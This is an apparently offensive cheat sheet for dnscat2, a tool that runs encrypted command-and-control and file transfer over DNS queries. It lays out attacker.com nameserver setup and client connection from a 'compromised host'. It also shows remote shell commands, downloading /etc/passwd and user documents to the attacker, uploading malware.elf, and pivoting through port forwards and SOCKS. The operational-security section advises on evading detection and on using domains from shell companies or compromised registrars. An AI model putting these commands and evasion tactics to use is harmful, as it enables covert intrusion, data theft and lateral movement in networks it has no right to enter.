dnscat2
dnscat2 creates encrypted DNS tunnels for command-and-control communication, allowing attackers to bypass network restrictions by hiding traffic within DNS queries. It supports multiple DNS record types, session management, and full bidirectional communication channels.
Installation
Section titled “Installation”Server Setup (Ruby)
Section titled “Server Setup (Ruby)”Install dnscat2 server from source with Ruby dependencies:
# Clone server repository
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server
# Install Ruby gems
gem install sinatra
gem install trollop
gem install bundler
# Or use Gemfile
bundle install
# Run server
ruby dnscat2.rb domain.comRequired Ruby gems: sinatra, trollop, optional eventmachine for async operations.
Client Compilation (C)
Section titled “Client Compilation (C)”Compile the C client with make:
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/client
# Compile with make
make
# Or compile with gcc directly
gcc -o dnscat dnscat.c -lm -lpthread
# Windows (MinGW)
make windowsDependencies: libpthread, libm (math library), libwininet for Windows builds.
Infrastructure Setup
Section titled “Infrastructure Setup”Domain and DNS Configuration
Section titled “Domain and DNS Configuration”Register a domain and delegate it to your authoritative DNS server:
# Delegate subdomain to your NS records
your-domain.com NS ns.attacker.comConfigure authoritative DNS server to handle queries for your tunnel domain:
# Example with BIND (named.conf)
zone "tunnel.attacker.com" {
type master;
file "/etc/bind/zones/tunnel.attacker.com";
allow-transfer { none; };
};Authoritative DNS Server
Section titled “Authoritative DNS Server”Point NS records to your controlled nameserver where dnscat2 will listen:
# DNS record configuration
tunnel.attacker.com IN NS dns1.attacker.com
dns1.attacker.com IN A 192.0.2.100dnscat2 server listens on UDP port 53 by default. Ensure firewall allows inbound DNS traffic.
Server Usage
Section titled “Server Usage”Basic Server Launch
Section titled “Basic Server Launch”Start the dnscat2 server on specified domain:
# Default usage
ruby dnscat2.rb domain.com
# Listen on specific interface
ruby dnscat2.rb --dns server=0.0.0.0,53 domain.com
# With port specification
ruby dnscat2.rb --dns server=0.0.0.0,5353 domain.com
# Verbose output
ruby dnscat2.rb -v domain.com
# Super verbose (debug)
ruby dnscat2.rb -vv domain.comSecurity Options
Section titled “Security Options”Enable encryption and authentication on the server:
# Require pre-shared secret for authentication
ruby dnscat2.rb --secret mysecretkey domain.com
# Security modes
ruby dnscat2.rb --security=open domain.com # No encryption
ruby dnscat2.rb --security=encrypted domain.com # Encrypted, no auth
ruby dnscat2.rb --secret key --security=encrypted domain.com
# Disable caching (forces fresh DNS lookups)
ruby dnscat2.rb --no-cache domain.com
# Set max packet length
ruby dnscat2.rb --max-length 255 domain.comClient Usage
Section titled “Client Usage”Basic Client Connection
Section titled “Basic Client Connection”Connect to dnscat2 server from compromised host:
# Basic connection
./dnscat --dns domain=domain.com
# Specify DNS server IP
./dnscat --dns server=192.0.2.100 --dns domain=domain.com
# With pre-shared secret
./dnscat --dns domain=domain.com --secret mysecretkey
# Verbose mode
./dnscat --dns domain=domain.com -vDNS Record Type Selection
Section titled “DNS Record Type Selection”Specify which DNS record types to use for tunneling:
# Use TXT records (most reliable)
./dnscat --dns type=TXT --dns domain=domain.com
# Use MX records
./dnscat --dns type=MX --dns domain=domain.com
# Use CNAME records
./dnscat --dns type=CNAME --dns domain=domain.com
# Use A records
./dnscat --dns type=A --dns domain=domain.com
# Use AAAA records (IPv6)
./dnscat --dns type=AAAA --dns domain=domain.com
# Cycle through multiple types
./dnscat --dns type=TXT --dns type=MX --dns domain=domain.comRetransmission and Reliability
Section titled “Retransmission and Reliability”Control packet retransmission behavior:
# Set maximum retransmit attempts
./dnscat --max-retransmits 5 --dns domain=domain.com
# Increase timeout (milliseconds)
./dnscat --dns timeout=1000 --dns domain=domain.com
# Reduce timeout for faster response
./dnscat --dns timeout=500 --dns domain=domain.comSession Management
Section titled “Session Management”Interactive Commands
Section titled “Interactive Commands”Manage active sessions within dnscat2 server:
# List all active sessions
> sessions
# Connect to specific session
> session -i 1
# Kill a session
> kill 1
# Suspend session (without terminating)
> suspend 1
# Resume suspended session
> resume 1
# Clear history
> history clearSession Types
Section titled “Session Types”Sessions vary by type and functionality:
# View session details
> sessions -i 1 --detailed
# Switch between sessions quickly
> session -i 2
> session -i 3Command Shell
Section titled “Command Shell”Interactive Shell Access
Section titled “Interactive Shell Access”Establish interactive shell through DNS tunnel:
# Start shell session
> shell
# Execute single command
> exec whoami
> exec ifconfig
> exec cat /etc/passwdExecute Remote Commands
Section titled “Execute Remote Commands”Run commands without interactive shell:
# From server console
> exec id
> exec uname -a
> exec ps aux
> exec netstat -anFile Transfer
Section titled “File Transfer”Download Files from Target
Section titled “Download Files from Target”Retrieve files through DNS tunnel to attacker system:
# Download single file
> download /etc/passwd
# Download to specific path
> download /etc/passwd /tmp/passwd.txt
# Download entire directory
> download /home/user/documentsUpload Files to Target
Section titled “Upload Files to Target”Transfer files from attacker to compromised host:
# Upload file
> upload /path/to/local/file /path/on/target
# Upload with confirmation
> upload ./malware.elf /tmp/malware.elfPort Forwarding
Section titled “Port Forwarding”Local Port Forwarding Through Tunnel
Section titled “Local Port Forwarding Through Tunnel”Forward local ports through the DNS tunnel:
# Listen on local port and forward through tunnel
> listen 127.0.0.1 4444 target_ip 3389
# Forward multiple ports
> listen 127.0.0.1 8080 internal-web-server 80
> listen 127.0.0.1 5432 internal-db 5432Accessing Forwarded Services
Section titled “Accessing Forwarded Services”Connect to internal services via forwarded ports:
# RDP through tunnel
rdesktop 127.0.0.1:4444
# SSH through tunnel
ssh -p 2222 user@127.0.0.1
# Database access
mysql -h 127.0.0.1 -P 5432 -u rootTunneling
Section titled “Tunneling”SOCKS Proxy Setup
Section titled “SOCKS Proxy Setup”Create SOCKS proxy for full network access through tunnel:
# Establish SOCKS proxy
> socks 127.0.0.1 1080
# Access internal network through proxy
proxy-host: 127.0.0.1
proxy-port: 1080Using SOCKS Proxy
Section titled “Using SOCKS Proxy”Route traffic through established SOCKS tunnel:
# curl through SOCKS
curl --socks5 127.0.0.1:1080 http://internal-server
# SSH through SOCKS
ssh -o ProxyCommand='nc -x 127.0.0.1:1080 %h %p' user@internal-host
# Proxychains configuration
proxychains nmap -sV internal-networkEncryption
Section titled “Encryption”Pre-Shared Secret Authentication
Section titled “Pre-Shared Secret Authentication”Use pre-shared keys for authentication between client and server:
# Server with secret
ruby dnscat2.rb --secret "SuperSecretPassword123" domain.com
# Client with matching secret
./dnscat --secret "SuperSecretPassword123" --dns domain=domain.comSAS Authentication
Section titled “SAS Authentication”Verify connection with SAS (Short Authentication String):
# Server prompts SAS on first connection
# Compare SAS on both client and server console
# Type "y" to confirm match
SAS (client): abc123
SAS (server): abc123Encryption Modes
Section titled “Encryption Modes”Different encryption configurations:
# No encryption (--security=open)
ruby dnscat2.rb --security=open domain.com
# Encrypted without authentication
ruby dnscat2.rb --security=encrypted domain.com
# Encrypted with pre-shared secret (most secure)
ruby dnscat2.rb --security=encrypted --secret mykey domain.comDNS Record Types
Section titled “DNS Record Types”Record Type Comparison
Section titled “Record Type Comparison”| Type | Size | Reliability | Stealth | Detection Risk |
|---|---|---|---|---|
| TXT | ~255 bytes | Excellent | Good | Medium |
| A | 4 bytes | Excellent | Poor | High |
| AAAA | 16 bytes | Good | Poor | High |
| MX | Variable | Good | Medium | Medium |
| CNAME | Variable | Good | Medium | Medium |
| NS | Variable | Moderate | Medium | Medium |
Choosing Record Types
Section titled “Choosing Record Types”Select based on network filtering and monitoring:
# TXT records - most reliable, common in logs
./dnscat --dns type=TXT --dns domain=domain.com
# A records - small, fast, but suspicious high volume
./dnscat --dns type=A --dns domain=domain.com
# MX records - less monitored, good alternative
./dnscat --dns type=MX --dns domain=domain.com
# Mixed types - rotate for evasion
./dnscat --dns type=TXT --dns type=MX --dns type=CNAME --dns domain=domain.comTroubleshooting
Section titled “Troubleshooting”Connection Issues
Section titled “Connection Issues”Verify DNS resolution and connectivity:
# Test DNS resolution
nslookup query.domain.com
dig @ns.attacker.com query.domain.com
# Check server listening
netstat -ulnp | grep 53
ss -ulnp | grep 53
# Test with dig from client
dig @192.0.2.100 test.domain.com TXTFirewall and Restrictions
Section titled “Firewall and Restrictions”Bypass DNS filtering and monitoring:
# If DNS port blocked, use alternate port
ruby dnscat2.rb --dns server=0.0.0.0,5353 domain.com
# Client connects to alternate port
./dnscat --dns server=192.0.2.100:5353 --dns domain=domain.com
# Use DNS over HTTPS (requires additional config)
# Many corporate firewalls restrict DoHDebugging Output
Section titled “Debugging Output”Increase verbosity for troubleshooting:
# Client verbose
./dnscat -v --dns domain=domain.com
./dnscat -vv --dns domain=domain.com
# Server verbose
ruby dnscat2.rb -v domain.com
ruby dnscat2.rb -vv domain.comBest Practices
Section titled “Best Practices”Operational Security
Section titled “Operational Security”Maintain stealthy DNS tunneling operations:
- Use TXT or MX records instead of A records (less suspicious)
- Rotate record types to evade pattern detection
- Use pre-shared secrets and encryption always
- Monitor DNS query volume and frequency
- Distribute queries over time to avoid rate-based detection
- Use domains registered to shell companies or compromised registrars
- Implement traffic shaping to match legitimate DNS patterns
Detection Evasion
Section titled “Detection Evasion”Techniques to avoid network monitoring:
- Randomize query intervals (add jitter to timing)
- Use legitimate-looking subdomains and query names
- Limit bandwidth to match normal DNS traffic
- Avoid querying during off-hours (traffic analysis)
- Use multiple tunnel domains if possible
- Implement retry logic for failed queries
- Monitor for DNS query logging and filtering
Operational Security Checklist
Section titled “Operational Security Checklist”# Test DNS filtering
./dnscat --dns type=TXT --dns domain=test.domain.com
# Verify encryption works
./dnscat --secret testkey --dns domain=domain.com
# Monitor bandwidth
top -p $(pgrep dnscat)
# Check query logs
tail -f /var/log/syslog | grep "domain.com"Related Tools
Section titled “Related Tools”Alternative DNS Tunneling Solutions
Section titled “Alternative DNS Tunneling Solutions”| Tool | Purpose | Advantages |
|---|---|---|
| Iodine | DNS tunnel (older) | Lightweight, simple |
| dns2tcp | TCP over DNS | Reliable, RFC-compliant |
| Chisel | HTTP/HTTPS tunneling | Modern, GO-based |
| Cobalt Strike | Beacon DNS plugin | Enterprise C2, integrated |
| OzymanDNS | DNS tunneling | Simple Python implementation |
| DNSExfil | Data exfiltration | Stealthy, modular |
Related Attack Techniques
Section titled “Related Attack Techniques”- DNS rebinding attacks
- DNS cache poisoning
- DNSSEC spoofing
- DNS amplification DDoS
- DNS tunneling with VPN overlay